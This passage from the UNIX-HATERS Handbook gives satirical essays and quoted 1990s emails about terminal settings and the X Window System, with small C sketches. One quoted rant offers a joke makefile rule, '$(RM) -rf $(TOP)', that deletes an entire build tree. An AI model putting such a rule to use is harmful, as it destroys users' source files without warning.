Date: Thu, 31 Jan 1991 11:06-0500
From: "John R. Dunning" <jrd@stony-brook.scrc.symbolics.com>
To: UNIX-HATERS
Subject: Unix vs terminal settings

So the other day I tried to telnet into a local Sun box to do something or other, but when I brought up emacs, it displayed a little itty-bitty window at the top of my virtual terminal screen: it was convinced my terminal was only a few lines high. I got out of it and verified that my TERM and TERMCAP environment variables were set right, and tried again, but nope, no better. I thrashed around for a while, to no avail, then finally gave up in disgust and sent mail off to the local Unix wizard (who shall remain nameless, though I think he's on this list) asking how the bleep Unix decides the size of my terminal and what should I do about it.

The wizard answered my mail with a marginally cryptic "Unix defaults, probably. Did you check the stty rows & columns settings?" I should have known better, but I went to ask him what that really meant. Smelling something rotten in the state of the software, I tried a few experiments, like I should have done in the first place. We logged into the offending Sun, and sure enough, typing "stty all" revealed that Unix thought the terminal was 10 lines high. Turns out a bunch of your terminal settings get set in some low-level terminal-port object or someplace, rather than being kept in some central place: you can easily get somebody else's leftover stuff from their last session, and nobody bothers to initialize them when you log in.

"So what should I do here? What do you do in your init file?" He prints out his init file. "Oh, you have to run tset, so you do." "But I do, in my login file." "Hmmm, tset with no args, I wonder what that does?" "Beats me. I don't know how it works. I just copied this file from other old Unices that I had accounts on. I just have this magic set of cryptic shell code here; I've just been carrying it around for years…" Grrr. "Why is it not sufficient to set my env vars?" "Because the information's stored in different places. It's just different sometimes." "Perhaps if I feel ambitious I should look up the documentation on tset? Or would that confuse me further?" "No, don't do that, it's useless."

Later I log in and say "stty all," and lo! It now thinks my terminal is 48 lines high! But wait a second, that's the value we typed in just a few minutes ago. And, of course, there are all kinds of ad hoc things to bash one piece of database into conformance with others. At this point I decided it was futile to try to understand any of this (if even the local wizard doesn't understand it, mere mortals should probably not even try) and went back to my office to fix my init file to brute-force the settings I wanted, and used Zmacs.

Makes me almost wish for my VMS machine back. I dunno, maybe this is old news to some of you, but I find it pretty appalling. Bleah.
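The shape of Dunning's problem is simple to state: the same fact, the screen height, lives in at least three unrelated places (the kernel's per-port stty setting, the environment, and the termcap entry), and every program picks its own order to consult them. Below is a sketch of the kind of resolver each program reinvents; the precedence shown is an assumption of ours, not any standard, which is exactly the problem.

```c
#include <stdlib.h>

/* Decide how many lines the terminal has.  kernel_rows is what an
   stty-style kernel query reported (0 if unset or stale), env_rows is a
   LINES-like environment value (NULL if absent), termcap_rows is the
   li# capability from the termcap entry.  Each program picked its own
   precedence; this is merely one plausible ordering. */
int terminal_rows(int kernel_rows, const char *env_rows, int termcap_rows)
{
    if (kernel_rows > 0)
        return kernel_rows;      /* the per-port object Dunning hit */
    if (env_rows != NULL && atoi(env_rows) > 0)
        return atoi(env_rows);   /* the variable he actually set */
    if (termcap_rows > 0)
        return termcap_rows;     /* the li# entry from /etc/termcap */
    return 24;                   /* punt: the traditional default */
}
```

With a stale 10-line stty value sitting in the port object, nothing Dunning did to his environment variables could ever win.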
7 The X-Windows Disaster
How to Make a 50-MIPS Workstation Run Like a 4.77MHz IBM PC

If the designers of X Windows built cars, there would be no fewer than five steering wheels hidden about the cockpit, none of which followed the same principles—but you'd be able to shift gears with your car stereo. Useful feature, that.

—Marcus J. Ranum
Digital Equipment Corporation

X Windows is the Iran-Contra of graphical user interfaces: a tragedy of political compromises, entangled alliances, marketing hype, and just plain greed. X Windows is to memory as Ronald Reagan was to money. Years of "Voodoo Ergonomics" have resulted in an unprecedented memory deficit of gargantuan proportions. Divisive dependencies, distributed deadlocks, and partisan protocols have tightened gridlocks, aggravated race conditions, and promulgated double standards.

X has had its share of $5,000 toilet seats—like Sun's Open Look clock tool, which gobbles up 1.4 megabytes of real memory! If you sacrificed all the RAM from 22 Commodore 64s to clock tool, it still wouldn't have enough to tell you the time. Even the vanilla X11R4 "xclock" utility consumes 656K to run. And X's memory usage is increasing.
X: The First Fully Modular Software Disaster

X Windows started out as one man's project in an office on the fifth floor of MIT's Laboratory for Computer Science. A wizardly hacker, who was familiar with W, a window system written at Stanford University as part of the V project, decided to write a distributed graphical display server. The idea was to allow a program, called a client, to run on one computer and allow it to display on another computer that was running a special program called a window server. The two computers might be VAXes or Suns, or one of each, as long as the computers were networked together and each implemented the X protocol.1

The Nongraphical GUI

X was designed to run three programs: xterm, xload, and xclock. (The idea of a window manager was added as an afterthought, and it shows.) For the first few years of its development at MIT, these were, in fact, the only programs that ran under the window system. Notice that none of these programs have any semblance of a graphical user interface (except xclock), only one of these programs implements anything in the way of cut-and-paste (and then, only a single data type is supported), and none of them requires a particularly sophisticated approach to color management. Is it any wonder, then, that these are all areas in which modern X falls down?

X took off in a vacuum. At the time, there was no established Unix graphics standard. X provided one—a standard that came with its own free implementation. X leveled the playing field: for most applications, everyone's hardware suddenly became only as good as the free MIT X Server could deliver. You need a fairly hefty computer to make X run fast—something that hardware vendors love. Even today, the X server still turns fast computers into dumb terminals.

1 We have tried to avoid paragraph-length footnotes in this book, but X has defeated us by switching the meaning of client and server. For some perverse reason that's better left to the imagination, X insists on calling the program running on the remote machine "the client"; this program displays its windows on the "window server." In all other client/server relationships, the server is the remote machine that runs the application (i.e., the server provides services, such a database service or computation service). We're going to follow X terminology when discussing graphical client/servers. So when you see "client," think "the remote machine where the application is running," and when you see "server," think "the local machine that displays output and accepts user input."
Ten years later, most computers running X run just four programs: xterm, xclock, xload, and a window manager. And most xterm windows run Emacs! X has to be the most expensive way ever of popping up an Emacs window. It sure would have been much cheaper and easier to put terminal handling in the kernel where it belongs, rather than forcing people to purchase expensive bitmapped terminals to run character-based applications. It's a trade-off.

The Motif Self-Abuse Kit

X gave Unix vendors something they had professed to want for years: a standard that allowed programs built for different computers to interoperate. But it didn't give them enough. X gave programmers a way to display windows and pixels, but it didn't speak to buttons, menus, scroll bars, or any of the other necessary elements of a graphical user interface. Programmers invented their own. Soon the Unix community had six or so different interface standards. A bunch of people who hadn't written 10 lines of code in as many years set up shop in a brick building in Cambridge, Massachusetts, that was the former home of a failed computer company and came up with a "solution:" the Open Software Foundation's Motif.

What Motif does is make Unix slow. Real slow. A stated design goal of Motif was to give the X Window System the window management capabilities of HP's circa-1988 window manager and the visual elegance of Microsoft Windows. We kid you not.

Recipe for disaster: start with the Microsoft Windows metaphor, which was designed and hand coded in assembler. Build something on top of three or four layers of X to look like Windows. Call it "Motif." Now put two 486 boxes side by side, one running Windows and one running Unix/Motif. Watch one crawl. Watch it wither. Watch it drop faster than the putsch in Russia. Motif can't compete with the Macintosh OS or with DOS/Windows as a delivery platform.

Ice Cube: The Lethal Weapon

One of the fundamental design goals of X was to separate the window manager from the window server. "Mechanism, not policy" was the mantra: the X servers provided a mechanism for drawing on the screen and managing windows, but did not implement a particular policy for human-computer interaction. While this might have seemed like a good
idea at the time (especially if you are in a research community, experimenting with different approaches for solving the human-computer interaction problem), it created a veritable user interface Tower of Babel.

If you sit down at a friend's Macintosh, with its single mouse button, you can use it with no problems. If you sit down at a friend's Windows box, with two buttons, you can use it, again with no problems. But just try making sense of a friend's X terminal: three buttons, each one programmed a different way to perform a different function on each different day of the week—and that's before you consider combinations like control-left-button, shift-right-button, control-shift-meta-middle-button, and so on.

Things are not much better from the programmer's point of view. As a result, one of the most amazing pieces of literature to come out of the X Consortium is the "Inter Client Communication Conventions Manual," more fondly known as the "ICCCM," "Ice Cubed," or "I39L" (short for "I, 39 letters, L"). It describes protocols that X clients must use to communicate with each other via the X server, including diverse topics like window management, selections, keyboard and colormap focus, and session management. In short, it tries to cover everything the X designers forgot and tries to fix everything they got wrong. But it was too late—by the time ICCCM was published, people were already writing window managers and toolkits, so each new version of the ICCCM was forced to bend over backwards to be backward compatible with the mistakes of the past.

The ICCCM is unbelievably dense, it must be followed to the last letter, and it still doesn't work. ICCCM compliance is one of the most complex ordeals of implementing X toolkits, window managers, and even simple applications. It's so difficult, that many of the benefits just aren't worth the hassle of compliance. If you want to write an interoperable ICCCM compliant application, you have to crossbar test it with every other application, and with all possible window managers, and then plead with the vendors to fix their problems in the next release. And when one program doesn't comply, it screws up other programs: keyboard focus lags behind the cursor, keys go to the wrong window, colormaps flash wildly and are never installed at the right time, drag-and-drop locks up the system, and deleting a popup window can quit the whole application. This is the reason that cut-and-paste never works properly with X (unless you are cutting and pasting straight ASCII text).

In summary, ICCCM is a technological disaster: a toxic waste dump of broken protocols, backward compatibility nightmares, complex nonsolutions to obsolete nonproblems, a twisted mass of scabs and scar tissue
intended to cover up the moral and intellectual depravity of the industry's standard naked emperor.

Using these toolkits is like trying to make a bookshelf out of mashed potatoes.

—Jamie Zawinski

X Myths

X is a collection of myths that have become so widespread and so prolific in the computer industry that many of them are now accepted as "fact," without any thought or reflection.

Myth: X Demonstrates the Power of Client/Server Computing

At the mere mention of network window systems, certain propeller heads who confuse technology with economics will start foaming at the mouth about their client/server models and how in the future palmtops will just run the X server and let the other half of the program run on some Cray down the street. They've become unwitting pawns in the hardware manufacturers' conspiracy to sell newer systems each year. After all, what better way is there to force users to upgrade their hardware than to give them X, where a single application can bog down the client, the server, and the network between them, simultaneously!

The database client/server model (the server machine stores all the data, and the clients beseech it for data) makes sense. The computation client/server model (where the server is a very expensive or experimental supercomputer, and the client is a desktop workstation or portable computer) makes sense. But a graphical client/server model that slices the interface down some arbitrary middle is like Solomon following through with his child-sharing strategy. The legs, heart, and left eye end up on the server, the arms and lungs go to the client, the head is left rolling around on the floor, and blood spurts everywhere.

The fundamental problem with X's notion of client/server is that the proper division of labor between the client and the server can only be decided on an application-by-application basis. Some applications (like a flight simulator) require that all mouse movement be sent to the application. Others need only mouse clicks. Still others need a sophisticated combination of the two, depending on the program's state or the region of the screen where the mouse happens to be. Some programs need to update meters or widgets on the screen every second. Other programs just want to display clocks; the server could just as well do the updating, provided that there was some way to tell it to do so.

The right graphical client/server model is to have an extensible server. Application programs on remote machines can download their own special extensions on demand and share libraries in the server. Downloaded code can draw windows, track input events, provide fast interactive feedback, and minimize network traffic by communicating with the application using a dynamic, high-level protocol.

As an example, imagine a CAD application built on top of such an extensible server. The application could download a program to draw an IC and associate it with a name. From then on, the client could draw the IC anywhere on the screen simply by sending the name and a pair of coordinates. Better yet, with such an extensible system, the client can download programs and data structures to draw the whole schematic, which are called automatically to refresh and scroll the window, without any network traffic or context switching. The user can drag an IC around smoothly, without bothering the server. This makes it possible to run interactive clients over low-speed (that is, low-bandwidth) communication lines.

Sounds like science fiction? An extensible window server was precisely the strategy taken by the NeWS (Network extensible Window System) window system written by James Gosling at Sun. With NeWS, the window manager itself was implemented inside the server, eliminating network overhead for window manipulation operations—and along with it the race conditions, context switching overhead, and interaction problems that plague X toolkits and window managers. Ultimately, the user interface toolkit becomes an extensible server library of classes that clients download directly into the server (the approach taken by Sun's TNT Toolkit). Toolkit objects in different applications share common objects in the server, saving both time and memory, and creating a look-and-feel that is both consistent across applications and customizable. NeWS was not economically or politically viable because it solved the very problems that X was designed to create.
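The download-a-procedure idea is easy to sketch. Below, a toy "server" lets a client register a named drawing routine once; every later request is just a name and two coordinates, the moral equivalent of the one-message IC redraw described above. All names here are invented, and NeWS actually downloaded PostScript rather than function pointers.

```c
#include <string.h>

typedef void (*drawfn)(int x, int y);

/* The server's table of procedures clients have downloaded. */
static struct { const char *name; drawfn fn; } registry[16];
static int nregistered;

/* "Download": the client ships code (here, a function pointer) once. */
void server_define(const char *name, drawfn fn)
{
    registry[nregistered].name = name;
    registry[nregistered].fn = fn;
    nregistered++;
}

/* Every subsequent request is tiny: a name and a pair of coordinates. */
int server_invoke(const char *name, int x, int y)
{
    int i;
    for (i = 0; i < nregistered; i++)
        if (strcmp(registry[i].name, name) == 0) {
            registry[i].fn(x, y);
            return 1;
        }
    return 0;   /* unknown procedure */
}

/* A sample downloaded procedure: records where the IC was "drawn". */
static int ic_x, ic_y;
static void draw_ic(int x, int y) { ic_x = x; ic_y = y; }
```

In an X-style dumb server, by contrast, every redraw of the IC means shipping the full list of drawing requests across the wire again.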
Myth: X Makes Unix "Easy to Use"

Graphical interfaces can only paper over misdesigns and kludges in the underlying operating system; they can't eliminate them. The "drag-and-drop" metaphor tries to cover up the Unix file system, but so little of Unix is designed for the desktop metaphor that it's just one kludge on top of another, with little holes and sharp edges popping up everywhere. Maybe the "sag-and-drop" metaphor is more appropriate for such ineffective and unreliable performance.

A shining example is Sun's Open Windows File Manager, which goes out of its way to display core dump files as cute little red bomb icons. When you double-click on the bomb, it runs a text editor on the core dump. Harmless, but not very useful. But if you intuitively drag and drop the bomb on the DBX Debugger Tool, it does exactly what you'd expect if you were a terrorist: it ties the entire system up, as the core dump (including a huge unmapped gap of zeros) is pumped through the server and into the debugger text window, which inflates to the maximum capacity of swap space, then violently explodes, dumping an even bigger core file in place of your original one, overwhelming the file server, filling up the file system, and taking out the File Manager with shrapnel. (This bug has since been fixed.)

But that's not all: the File Manager puts even more power at your fingertips if you run it as root! When you drag and drop a directory onto itself, it beeps and prints "rename: invalid argument" at the bottom of the window, then instantly deletes the entire directory tree without bothering to update the graphical directory browser.

The following message illustrates the X approach to "security through obscurity":

Date: Wed, 30 Jan 91 15:35:46 -0800
From: David Chapman <zvona@gang-of-four.stanford.edu>
To: UNIX-HATERS
Subject: MIT-MAGIC-COOKIE-1

For the first time today I tried to use X for the purpose for which it was intended, namely cross-network display. So I got a telnet window from boris, where I was logged in and running X, to akbar, where my program runs. Ran the program and it dumped core. Oh. No doubt there's some magic I have to do to turn cross-network X on. That's stupid. OK, ask the unix wizard. You say setenv DISPLAY boris:0. Presumably this means that X is too stupid to figure out where you are coming from, or Unix is too stupid to tell it. Run the program again. Now it tells me that the server is not authorized to talk to the client. Talk to the unix wizard again. Oh, yes, to tell it that it's OK for boris to talk to akbar, you have to run xauth. I thought that was the tool I used for locking the strings into the Floyd Rose on my guitar. This is done on a per-user basis for some reason. I give this 10 seconds of thought: what sort of security violation is this going to help with? Can't come up with any model. Oh, well, that's Unix for you; just run xauth and don't worry about it.

xauth has a command processor and wants to have a long talk with you. It manipulates a .Xauthority file, apparently. OK, presumably we want to add an entry for boris. Do:

xauth> help add
add dpyname protoname hexkey    add entry

Well, that's not very helpful. Presumably dpy is unix for "display" and protoname must be… uh… right. Well, maybe it will default sensibly.

xauth> add boris:0
xauth: (stdin):4 bad "add" command line

Great. Well, let's look at the man page. Oh, you might want to man xauth yourself, for a good joke. I won't include the whole man page here. Here's the explanation of the add command:

add displayname protocolname hexkey

An authorization entry for the indicated display using the given protocol and key data is added to the authorization file. The data is specified as an even-length string of hexadecimal digits, each pair representing one octet. The first digit gives the most significant 4 bits of the octet and the second digit gives the least significant 4 bits. A protocol name consisting of just a single period is treated as an abbreviation for MIT-MAGIC-COOKIE-1.

This is obviously totally out of control. What the hell protocol am I supposed to use? Why should I have to know? Oh, I suppose I'll need to know what a hexkey is, too. (Better not speculate about what the 0 is for.) Since we set the DISPLAY variable to "boris:0," maybe that's a dpyname. In order to run a program across the goddamn network I'm supposed to be typing in strings of hexadecimal digits which do god knows what using a program that
has a special abbreviation for MIT-MAGIC-COOKIE-1? And what the hell kind of a name for a network protocol is that? Why is it so important that it's the default protocol name? Obviously it is Allah's will that I throw the Unix box out the window. I submit to the will of Allah.

Anybody who has ever used X knows that Chapman's error was trying to use xauth in the first place. (Blame the victim, not the program.)

Date: Wed, 30 Jan 91 23:49:46 EST
From: Olin Shivers <shivers@bronto.soar.cs.cmu.edu>
To: ian@ai.mit.edu
Cc: zvona@gang-of-four.stanford.edu, UNIX-HATERS
Subject: MIT-MAGIC-COOKIE-1

Hereabouts at CMU, I know several people who are fairly wizardly X hackers. I don't know anyone that uses xauth. None of these guys uses xauth. They just live dangerously, or sort of nervously toggle the xhost authentication when they need to crank up an X network connection. For example, the guy that posted the program showing how to capture keystrokes from an X server (so you can, for example, watch him type in his password) is a grad student here. He should have known better.

When I think of the time that I have invested trying to understand and use these systems, and of the several people I know who have stared at them long and hard, I can't really get a mental picture of the sort of people who design these kinds of systems. What bizarre pathways do their minds wander? The closest I can get is an image of an order-seeking system that is swamped by injected noise—some mental patients exhibit that kind of behavior. They try so hard to be coherent, rational, but in the end the complexity of the noise overwhelms them. I conclude that these systems are really a sort of cognitive black hole. A cycle sink. A malignant entity that lurks around, waiting to entrap the unwary.

It's really sobering to think we live in a society that allows the people who design systems like xauth to vote, drive cars, own firearms, and reproduce.
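For the record, the dreaded "hexkey" is nothing more than the bytes of a random cookie spelled out two hex digits per octet, most significant nibble first, just as the man page says. A sketch of that encoding (ours, not xauth's code):

```c
#include <stddef.h>

/* Spell n bytes as the even-length hex string xauth wants: two digits
   per octet, high nibble first.  hex must hold 2*n + 1 chars. */
void cookie_to_hex(const unsigned char *key, size_t n, char *hex)
{
    static const char digit[] = "0123456789abcdef";
    size_t i;
    for (i = 0; i < n; i++) {
        hex[2 * i]     = digit[key[i] >> 4];    /* most significant 4 bits */
        hex[2 * i + 1] = digit[key[i] & 0x0f];  /* least significant 4 bits */
    }
    hex[2 * n] = '\0';
}
```

An MIT-MAGIC-COOKIE-1 key is 16 random octets, so the string the user is expected to type by hand is 32 hex digits. That this ever had to be typed by hand is the point of Chapman's message.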
Myth: X Is "Customizable"

…And so is a molten blob of pig iron. But it's getting better: at least now you don't have to use your bare hands. Hewlett-Packard's Visual User Environment is so cutting-edge that it even has an icon you can click on to bring up the resource manager: it pops up a vi on your .Xdefaults file! Quite a labor-saving contraption, as long as you're omniscient enough to understand X defaults and archaic enough to use vi. The following message describes the awesome flexibility and unbounded freedom of expression that X defaults fail to provide.

Date: Fri, 22 Feb 91 08:17:14 -0800
From: beldar@mips.com (Gardner Cohen)

I guess josh just sent you mail about .Xdefaults. I'm interested in the answer as well. How do X programs handle defaults? Do they all roll their own?

If they're Xt, they follow some semblance of standards, and you can walk the widget tree of a running application to find out what there is to modify. If they're not Xt, they can do any damn thing they want. They can XGetDefault, which doesn't look at any class names and doesn't notice command line -xrm things.

Figuring out where a particular resource value is for a running application is much fun, as a resource can come from any of the following (there is a specified order for this, which has changed from R2 to R3 to R4):

• Filename pointed to by XENVIRONMENT
• .Xdefaults-hostname
• Filename that's the class name of the application (usually completely nonintuitively generated: XParty for xparty, XRn for xrn, Mwm for mwm, etc.) in the directory /usr/lib/X11/app-defaults (or the directory pointed to by the XAPPLRESDIR environment variable). The default for this directory may have been changed by whoever built and installed the x libraries.
• .Xdefaults (only if they didn't xrdb something)
• Command line -xrm 'thing.resource: value'
• xrdb, which the user runs in .xsession or .xinitrc; this program runs cpp on the supplied filename argument, so any old junk may have been #included from another planet, so you better know what kind of display it's running on.

Oh, and the truly inventive program may actively seek out and merge resource databases from other happy places. The Motifified xrn posted recently had a retarded resource editor that drops modified resources in files in the current directory as well as in the user's home. On startup, it happily looks all over the place for amusing-looking file names to load, many of them starting with dots so they won't 'bother' you when you list your files. Or, even better: writers of WCL-based applications can load resource files that actually generate new widgets with names specified in those (or other) resource files.

What this means is that the smarter-than-the-average-bear user who actually managed to figure out that snot.goddamn.widget.fontList: micro is the resource to change the font in his snot application could be unable to figure out where to put it. Joe sitting in the next cubicle over will say, "just put it in your .Xdefaults," but Joe either doesn't xrdb, or was told by someone once to xrdb .Xdefaults, and he doesn't know why. He wonders why when he edits .Xdefaults, the changes don't happen until he 'logs out,' since he never reran xrdb to reload the resources. And when he uses the NCD from home, things act 'different,' and he can't figure out why. "It's just different sometimes."

Pat Clueless has figured out that XAPPLRESDIR is the way to go, as it allows separate files for each application. But Pat doesn't know what the class name for this thing is. Pat knows that the copy of the executable is called snot, but when Pat adds a file Snot or XSnot or Xsnot, nothing happens. Pat has a man page that forgot to mention the application class name, and always describes resources starting with '*', which is no help. Pat asks Gardner, who fires up emacs on the executable, and searches for (case insensitive) snot, and finds a few SNot strings, and suggests that. It works, hooray. Gardner figures Pat can even use SNot*fontList: micro to change all the fonts in the application, but finds that a few widgets don't get that font for some reason. Someone points out that there is a line in Pat's .xresources (or was it a file that was #included in .xresources) of the form *goddamn*fontList: 10x22, and that, of course, that resource is 'more specific' than Pat's, whatever the hell that means, so it takes precedence. Sorry, Steve, as Pat copied your .xsession, which you copied from the guy who quit last year, and he does an xrdb .xresources, so .Xdefaults never gets read. You can't even remember what application that resource was supposed to change anymore. Too bad. Sigh. It goes on and on.

Try to explain to someone how to modify some behavior of the window manager: edit .mwmrc, then select the window manager restart menu item (which most people don't have, as they copied the guy next door's .xinitrc), or log out, what with having to re-xrdb. Which file do I have to edit? .mwmrc? Mwm? .Xdefaults? .xrdb? .xresources? .xsession? .xinitrc? .ncd? Why doesn't all this work the way I want? How come when I try to use the workstation sitting next to mine, some of the windows come up on my workstation? Why is it when I rlogin to another machine, I get these weird X messages and core dumps when I try to run this application? How do I turn this autoraising behavior off? I don't know where it came from; I just #included Bob's color scheme file, and everything went wrong, and I can't figure out why! SOMEBODY SHOOT ME, I'M IN HELL!!!

Myth: X Is "Portable"

…And Iran-Contra wasn't Arms for Hostages.

Even if you can get an X program to compile, there's no guarantee it'll work with your server. If an application requires an X extension that your server doesn't provide, then it fails. X applications can't extend the server themselves: the extension has to be compiled and linked into the server. Most interesting extensions actually require extensive modification and recompilation of the X server itself, a decidedly nontrivial task. The following message tells how much brain-searing, eye-popping fun compiling "portable" X server extensions can be:

Date: Wed, 4 Mar 92 02:53:53 PST
From: Jamie Zawinski [jwz@lucid.com]
To: UNIX-HATERS
Subject: X: or, How I Learned to Stop Worrying and Love the Bomb
X-Windows: Boy, Is my Butt Sore
Don't ever believe the installation instructions of an X server extension. Just don't, it's an utter waste of time. You may be thinking to yourself, "I'll just install this piece of code and recompile my X server and then X will be JUST a LITTLE BIT less MORONIC; it'll be EASY. I'll have worked around another STUPID MISDESIGN, and I'll be WINNING." Ha! Consider whether chewing on glass might have more of a payoff than what you're about to go through.

After four hours of pain, including such loveliness as a dozen directories in which you have to make a symlink called "X11" pointing at wherever the real X includes are, because the automatically generated makefiles are coming out with stuff like:

    -I../../../../include

instead of:

    -I../../../../mit/include

and, even better:

    -I../../../../../../../../../../include

and then realizing that "makedepend," which you don't really care about running anyway, doesn't WORK with symlinks, and is getting errors because the extension's installation script made symlinks to directories instead of copies, and then having to hand-hack these automatically generated makefiles anyway because some random preprocessor symbols weren't defined and are causing spurious "don't know how to make" errors, and…

You'll finally realize that the only way to compile anything that's a basic part of X is to go to the top of the tree, five levels higher than the executable that you actually want to generate, and say "make Everything." Then come back an hour later when it's done making the MAKEFILES to see if there were any actual COMPILATION problems. And then you'll find yourself asking questions like, "why is it compiling that? I didn't change that. What's it DOING?" And don't forget that you HAVE to compile ALL of PEX, even though none of it actually gets linked in to any executables that you'll ever run.

And then you'll realize what you did wrong. You'll realize what you should have done ALL ALONG:

    all::
            $(RM) -rf $(TOP)

But BE CAREFUL! That second line can't begin with a space. This is for your OWN GOOD!

If you really don't need the extension, then why complicate your code with special cases? And most applications that do use extensions just assume they're supported and bomb if they're not. Most application writers just don't bother using proprietary extensions like Display PostScript, and many find it too much of a hassle to use more ubiquitous extensions like shared memory, double buffering, or splines: they still don't work in many cases, because X terminals and MIT servers don't support them, so you have to be prepared to do without them. On the whole, X extensions are a failure. The notable exception that proves the rule is the Shaped Window extension, which was specifically designed to implement round clocks and eyeballs.

The most that can be said about the lowest-common-denominator approach that X takes to graphics is that it levels the playing field, allowing incredibly stupid companies to jump on the bandwagon and sell obsolete junk that's just as unusable as high-end, brand-name workstations:

Date: Wed, 10 Apr 91 08:14:16 EDT
From: Steve Strassmann <straz@media-lab.mit.edu>
To: UNIX-HATERS
Subject: the display from hell

My HP 9000/835 console has two 19" color monitors, and some extremely expensive Turbo SRX graphics hardware to drive them. You'd think that I could simply tell X windows that it has two displays, but that would be unthinkably simple. No, sorry, I lied about that. You see, the Turbo SRX display has a graphics plane (with 24 bits per pixel) and an overlay plane (with 4 bits per pixel). The overlay plane is for things like, well, window systems, which need things like cursors, and the graphics plane is to draw 3D graphics. So what I really have is two display devices, /dev/crt0 and /dev/crt1, the left one and the right one.
So I really need four devices:

    /dev/crt0    the graphics plane of the right monitor
    /dev/crt1    the graphics plane of the left monitor
    /dev/ocrt0   the overlay plane of the right monitor
    /dev/ocrt1   the overlay plane of the left monitor

No, sorry, I lied about that. /dev/ocrt0 only gives you three out of the four overlay bits. The fourth bit is reserved exclusively for the private use of federal emergency relief teams in case of a national outbreak of Pixel Rot. If you want to live dangerously and under threat of FBI investigation, you can use /dev/o4crt0 and /dev/o4crt1 in order to really draw on the overlay planes.

So, all you have to do is tell X Windows to use these o4 overlays. No, sorry, I lied about that. X will not run in these 4-bit overlay planes. This is because I'm using Motif, which is so sophisticated it forces you to put a 1" thick border around each window in case your mouse is so worthless you can't hit anything you aim at, so you need widgets designed from the same style manual as the runway at Moscow International Airport. If you're using the Motif self-abuse kit, asking for the 17th color causes your program to crash horribly. Unlike an IBM PC Jr., this workstation with $150,000 worth of 28 bits-per-pixel supercharged display hardware cannot display more than 16 colors at a time. My program has a browser that actually uses different colors to distinguish different kinds of nodes.

So, thinks I to myself cleverly, I shall run X Windows on the graphics plane. This means X will not use the overlay planes. This also means I cannot use the super cool 3D graphics hardware either, because in order to draw a cube, I would have to "steal" the frame buffer from X, which is surly and uncooperative about that sort of thing.

The overlay plane, however, is used for /dev/console, which means all console messages get printed in 10 Point Troglodyte Bold, superimposed in white over whatever else is on my screen, like, for example, a demo that I may happen to be giving at the time. The usual X commands for refreshing the screen are helpless to remove this incontinence, because X has no access to the overlay planes. I had to write a program in C, to be invoked from some xterm window, that does nothing but wipe up after the mess on the overlay planes.
Every time anyone in the lab prints to the printer attached to my machine, or NFS wets its pants with a timeout, or some file server threatens to go down in only three hours for scheduled maintenance, another message goes onto my screen like a court reporter with Tourette's Syndrome.

My super 3D graphics, then, runs only on /dev/crt1, and X Windows runs only on /dev/crt0. Of course, this means I cannot move my mouse over to the 3D graphics display, but as the HP technical support person said, "Why would you ever need to point to something that you've drawn in 3D?"

Myth: X Is Device Independent

X is extremely device dependent because all X graphics are specified in pixel coordinates. Graphics drawn on different resolution screens come out at different sizes, so you have to scale all the coordinates yourself if you want to draw at a certain size. Not all screens even have square pixels: unless you don't mind rectangular squares and oval circles, you also have to adjust all coordinates according to the pixel aspect ratio.

A task as simple as filling and stroking shapes is quite complicated because of X's bizarre pixel-oriented imaging rules. When you fill a 10x10 square with XFillRectangle, it fills the 100 pixels you expect. But you get extra "bonus pixels" when you pass the same arguments to XDrawRectangle, because it actually draws an 11x11 square, hanging out one pixel below and to the right!!! If you find this hard to believe, look it up in the X manual yourself: Volume 1, Section 6.1.4. The manual patronizingly explains how easy it is to add 1 to the x and y position of the filled rectangle, while subtracting 1 from the width and height to compensate, so it fits neatly inside the outline. Then it points out that "in the case of arcs, however," this is "a much more difficult proposition (probably impossible in a portable fashion)." This means that portably filling and stroking an arbitrarily scaled arc without overlapping or leaving gaps is an intractable problem when using the X Window System. Think about that. You can't even draw a proper rectangle with a thick outline, since the line width is specified in unscaled pixel units: if your display has rectangular pixels, the vertical and horizontal lines will have different thicknesses even though you scaled the rectangle corner coordinates to compensate for the aspect ratio.
The color situation is a total flying circus. The X approach to device independence is to treat everything like a MicroVAX framebuffer on acid. A truly portable X application is required to act like the persistent customer in Monty Python's "Cheese Shop" sketch, or a grail seeker in "Monty Python and the Holy Grail." Even the simplest applications must answer many difficult questions:

Server: What is your Display?
Client: display = XOpenDisplay("unix:0");
Server: What is your Root?
Client: root = RootWindow(display, DefaultScreen(display));
Server: And what is your Window?
Client: win = XCreateSimpleWindow(display, root, 0, 0, 256, 256, 1,
            BlackPixel(display, DefaultScreen(display)),
            WhitePixel(display, DefaultScreen(display)));
Server: Oh all right, you can go on.

(client passes)

Server: What is your Display?
Client: display = XOpenDisplay("unix:0");
Server: What is your Colormap?
Client: cmap = DefaultColormap(display, DefaultScreen(display));
Server: And what is your favorite color?
Client: favorite_color = 0; /* Black. */
        /* Whoops! No, I mean: */
        favorite_color = BlackPixel(display, DefaultScreen(display));
        /* AAAYYYYEEEEE!! */

(client dumps core and falls into the chasm)

Server: What is your display?
Client: display = XOpenDisplay("unix:0");
Server: What is your visual?
Client: struct XVisualInfo vinfo;
        if (XMatchVisualInfo(display, DefaultScreen(display),
                             8, PseudoColor, &vinfo) != 0)
            visual = vinfo.visual;
Server: And what is the net speed velocity of an XConfigureWindow request?
Client: /* Is that a SubStructureRedirectMask or
         * a ResizeRedirectMask? */
Server: What?! How am I supposed to know that? Aaaauuuggghhh!!!!

(server dumps core and falls into the chasm)
X Graphics: Square Peg in a Round Hole

Programming X Windows is like trying to find the square root of pi using roman numerals.
—Unknown

The PostScript imaging model, used by NeWS and Display PostScript, solves all these horrible problems in a high-level, standard, device-independent manner. It can draw and respond to input in the same arbitrary coordinate system and define window shapes with PostScript paths. NeWS has integrated extensions for input, lightweight processes, networking, and windows. The Display PostScript extension for X is intended for output only and doesn't address any window system issues, which must be dealt with through X.

NEXTSTEP is a toolkit written in Objective-C, on top of NeXT's own window server. NEXTSTEP uses Display PostScript for imaging, but not for input. It has an excellent imaging model and well-designed toolkit, but the Display PostScript server is not designed to be programmed with interactive code: instead, all events are sent to the client for processing, and the toolkit runs in the client, so it does not have the low bandwidth, context-switching, and code-sharing advantages of NeWS. Nevertheless, it is still superior to X, which lacks the device-independent imaging model.

Unfortunately, NeWS and NEXTSTEP were political failures because they suffer from the same two problems: oBNoXiOuS capitalization, and Amiga Persecution Attitude. X's spelling, on the other hand, has remained constant over the years, while NeXT has at various times spelled their flagship product "NextStep," "NeXTstep," "NeXTStep," "NeXTSTEP," "NEXTSTEP," and finally "OpenStep." A standardized, consistent spelling is certainly easier on the marketing 'droids.
X: On the Road to Nowhere

X is just so stupid, why do people use it? Beats us. Maybe it's because they don't have a choice. (See Figure 2.)

